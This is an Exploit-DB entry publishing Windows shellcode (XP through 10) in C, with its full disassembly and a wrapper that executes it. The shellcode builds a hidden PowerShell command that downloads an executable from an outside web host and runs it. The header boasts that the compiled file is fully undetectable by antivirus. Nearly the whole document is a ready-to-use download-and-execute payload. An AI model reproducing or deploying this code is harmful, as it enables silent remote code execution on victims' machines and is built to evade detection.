Windows (XP < 10) - Download File + Execute Shellcode

EDB-ID:

39979

CVE:

N/A

Author:

B3mB4m

Platform:

Windows

Published:

2016-06-20

/*
[+] Author  : B3mB4m
[~] Contact : b3mb4m@protonmail.com
[~] Project : https://github.com/b3mb4m/shellsploit-framework
[~] Greetz  : Bomberman,T-Rex,Pixi
-----------------------------------------------------------

Tested on : 
    Windows XP/SP3 x86
    Windows 7 Ultimate x64  
    Windows 8.1 Pro Build 9600 x64
    Windows 10 Home x64


* This source belongs to shellsploit project under MIT licence.

* If you convert it an executable file, its will be FUD(without any encrypt).
 	-PoC : https://nodistribute.com/result/qwxU3DmFCR2M0OrQt



	0x0:	31c9			xor ecx, ecx
	0x2:	b957696e45		mov ecx, 0x456e6957
	0x7:	eb04			jmp 0xd
	0x9:	31c9			xor ecx, ecx
	0xb:	eb00			jmp 0xd
	0xd:	31c0			xor eax, eax
	0xf:	31db			xor ebx, ebx
	0x11:	31d2			xor edx, edx
	0x13:	31ff			xor edi, edi
	0x15:	31f6			xor esi, esi
	0x17:	648b7b30		mov edi, dword ptr fs:[ebx + 0x30]
	0x1b:	8b7f0c			mov edi, dword ptr [edi + 0xc]
	0x1e:	8b7f1c			mov edi, dword ptr [edi + 0x1c]
	0x21:	8b4708			mov eax, dword ptr [edi + 8]
	0x24:	8b7720			mov esi, dword ptr [edi + 0x20]
	0x27:	8b3f			mov edi, dword ptr [edi]
	0x29:	807e0c33		cmp byte ptr [esi + 0xc], 0x33
	0x2d:	75f2			jne 0x21
	0x2f:	89c7			mov edi, eax
	0x31:	03783c			add edi, dword ptr [eax + 0x3c]
	0x34:	8b5778			mov edx, dword ptr [edi + 0x78]
	0x37:	01c2			add edx, eax
	0x39:	8b7a20			mov edi, dword ptr [edx + 0x20]
	0x3c:	01c7			add edi, eax
	0x3e:	89dd			mov ebp, ebx
	0x40:	81f957696e45	cmp ecx, 0x456e6957
	0x46:	0f8530010000	jne 0x17c
	0x4c:	8b34af			mov esi, dword ptr [edi + ebp*4]
	0x4f:	01c6			add esi, eax
	0x51:	45				inc ebp
	0x52:	390e			cmp dword ptr [esi], ecx
	0x54:	75f6			jne 0x4c
	0x56:	8b7a24			mov edi, dword ptr [edx + 0x24]
	0x59:	01c7			add edi, eax
	0x5b:	668b2c6f		mov bp, word ptr [edi + ebp*2]
	0x5f:	8b7a1c			mov edi, dword ptr [edx + 0x1c]
	0x62:	01c7			add edi, eax
	0x64:	8b7caffc		mov edi, dword ptr [edi + ebp*4 - 4]
	0x68:	01c7			add edi, eax
	0x6a:	89d9			mov ecx, ebx
	0x6c:	b1ff			mov cl, 0xff
	0x6e:	53				push ebx
	0x6f:	e2fd			loop 0x6e
	0x71:	68293b7d22		push 0x227d3b29
	0x76:	6865786527		push 0x27657865
	0x7b:	687474792e		push 0x2e797474
	0x80:	6828277075		push 0x75702728
	0x85:	6863757465		push 0x65747563
	0x8a:	686c457865		push 0x6578456c
	0x8f:	685368656c		push 0x6c656853
	0x94:	686f6e292e		push 0x2e296e6f
	0x99:	6863617469		push 0x69746163
	0x9e:	6870706c69		push 0x696c7070
	0xa3:	686c6c2e41		push 0x412e6c6c
	0xa8:	6820536865		push 0x65685320
	0xad:	682d636f6d		push 0x6d6f632d
	0xb2:	6865637420		push 0x20746365
	0xb7:	682d4f626a		push 0x6a624f2d
	0xbc:	68284e6577		push 0x77654e28
	0xc1:	682729203b		push 0x3b202927
	0xc6:	682e657865		push 0x6578652e
	0xcb:	6875747479		push 0x79747475
	0xd0:	682c202770		push 0x7027202c
	0xd5:	6865786527		push 0x27657865
	0xda:	687474792e		push 0x2e797474
	0xdf:	68362f7075		push 0x75702f36
	0xe4:	68742f7838		push 0x38782f74
	0xe9:	6861746573		push 0x73657461
	0xee:	6874792f6c		push 0x6c2f7974
	0xf3:	682f707574		push 0x7475702f
	0xf8:	687468616d		push 0x6d616874
	0xfd:	6873677461		push 0x61746773
	0x102:	686c692f7e		push 0x7e2f696c
	0x107:	687274682e		push 0x2e687472
	0x10c:	68652e6561		push 0x61652e65
	0x111:	682f2f7468		push 0x68742f2f
	0x116:	687470733a		push 0x3a737074
	0x11b:	6828276874		push 0x74682728
	0x120:	6846696c65		push 0x656c6946
	0x125:	686c6f6164		push 0x64616f6c
	0x12a:	68446f776e		push 0x6e776f44
	0x12f:	686e74292e		push 0x2e29746e
	0x134:	68436c6965		push 0x65696c43
	0x139:	682e576562		push 0x6265572e
	0x13e:	68204e6574		push 0x74654e20
	0x143:	686a656374		push 0x7463656a
	0x148:	68772d4f62		push 0x624f2d77
	0x14d:	6820284e65		push 0x654e2820
	0x152:	682226207b		push 0x7b202622
	0x157:	68616e6420		push 0x20646e61
	0x15c:	68636f6d6d		push 0x6d6d6f63
	0x161:	686c6c202d		push 0x2d206c6c
	0x166:	6872736865		push 0x65687372
	0x16b:	68706f7765		push 0x65776f70
	0x170:	89e2			mov edx, esp
	0x172:	41				inc ecx
	0x173:	51				push ecx
	0x174:	52				push edx
	0x175:	ffd7			call edi
	0x177:	e88dfeffff		call 9
	0x17c:	8b34af			mov esi, dword ptr [edi + ebp*4]
	0x17f:	01c6			add esi, eax
	0x181:	45				inc ebp
	0x182:	813e45786974	cmp dword ptr [esi], 0x74697845
	0x188:	75f2			jne 0x17c
	0x18a:	817e0450726f63	cmp dword ptr [esi + 4], 0x636f7250
	0x191:	75e9			jne 0x17c
	0x193:	8b7a24			mov edi, dword ptr [edx + 0x24]
	0x196:	01c7			add edi, eax
	0x198:	668b2c6f		mov bp, word ptr [edi + ebp*2]
	0x19c:	8b7a1c			mov edi, dword ptr [edx + 0x1c]
	0x19f:	01c7			add edi, eax
	0x1a1:	8b7caffc		mov edi, dword ptr [edi + ebp*4 - 4]
	0x1a5:	01c7			add edi, eax
	0x1a7:	31c9			xor ecx, ecx
	0x1a9:	51				push ecx
	0x1aa:	ffd7			call edi
*/

#include<stdio.h>
 
char shellcode[]=\
 
"\x31\xc9\xb9\x57\x69\x6e\x45\xeb\x04\x31\xc9\xeb\x00\x31\xc0\x31\xdb\x31\xd2\x31\xff\x31\xf6\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x81\xf9\x57\x69\x6e\x45\x0f\x85\x30\x01\x00\x00\x8b\x34\xaf\x01\xc6\x45\x39\x0e\x75\xf6\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x29\x3b\x7d\x22\x68\x65\x78\x65\x27\x68\x74\x74\x79\x2e\x68\x28\x27\x70\x75\x68\x63\x75\x74\x65\x68\x6c\x45\x78\x65\x68\x53\x68\x65\x6c\x68\x6f\x6e\x29\x2e\x68\x63\x61\x74\x69\x68\x70\x70\x6c\x69\x68\x6c\x6c\x2e\x41\x68\x20\x53\x68\x65\x68\x2d\x63\x6f\x6d\x68\x65\x63\x74\x20\x68\x2d\x4f\x62\x6a\x68\x28\x4e\x65\x77\x68\x27\x29\x20\x3b\x68\x2e\x65\x78\x65\x68\x75\x74\x74\x79\x68\x2c\x20\x27\x70\x68\x65\x78\x65\x27\x68\x74\x74\x79\x2e\x68\x36\x2f\x70\x75\x68\x74\x2f\x78\x38\x68\x61\x74\x65\x73\x68\x74\x79\x2f\x6c\x68\x2f\x70\x75\x74\x68\x74\x68\x61\x6d\x68\x73\x67\x74\x61\x68\x6c\x69\x2f\x7e\x68\x72\x74\x68\x2e\x68\x65\x2e\x65\x61\x68\x2f\x2f\x74\x68\x68\x74\x70\x73\x3a\x68\x28\x27\x68\x74\x68\x46\x69\x6c\x65\x68\x6c\x6f\x61\x64\x68\x44\x6f\x77\x6e\x68\x6e\x74\x29\x2e\x68\x43\x6c\x69\x65\x68\x2e\x57\x65\x62\x68\x20\x4e\x65\x74\x68\x6a\x65\x63\x74\x68\x77\x2d\x4f\x62\x68\x20\x28\x4e\x65\x68\x22\x26\x20\x7b\x68\x61\x6e\x64\x20\x68\x63\x6f\x6d\x6d\x68\x6c\x6c\x20\x2d\x68\x72\x73\x68\x65\x68\x70\x6f\x77\x65\x89\xe2\x41\x51\x52\xff\xd7\xe8\x8d\xfe\xff\xff\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x45\x78\x69\x74\x75\xf2\x81\x7e\x04\x50\x72\x6f\x63\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x31\xc9\x51\xff\xd7";
 
main(){(* (int(*)()) shellcode)();}